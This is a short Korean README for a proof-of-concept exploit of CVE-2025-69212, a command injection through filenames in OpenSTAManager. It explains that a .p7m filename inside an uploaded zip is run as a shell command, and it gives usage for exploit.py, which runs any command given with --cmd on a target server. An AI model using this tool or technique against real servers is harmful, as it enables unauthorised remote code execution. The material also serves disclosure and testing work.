
CVE-2025-69212 Proof-of-concept.
OpenSTAManager는 기술 지원, 전자 송장 발행 및 회계를 위한 관리 소프트웨어 솔루션입니다. <=2.9.8 버전은 인증된 원격 코드 실행 취약점에 영향을 받습니다. 공격자는 특수하게 조작된 .zip 아카이브를 업로드하여 파일 이름이 셸 명령으로 해석될 수 있는 .p7m 파일을 포함시킴으로써 이 취약점을 악용할 수 있으며, 이로 인해 원격 서버에서 임의의 명령이 실행됩니다.
$ pip install requests
$ python3 exploit.py [-h] --user USER --password PASSWORD [--target TARGET] [--cmd CMD]
예시:
$ python3 exploit.py --user="admin" --password="admin" --target="http://example.com/" --cmd="id"
-h, --help 이 도움말 메시지를 표시하고 종료합니다
--user USER 인증을 위한 사용자 이름
--password PASSWORD 인증을 위한 비밀번호
--target TARGET 대상 도메인 엔드포인트
--cmd CMD 서버에서 실행할 명령어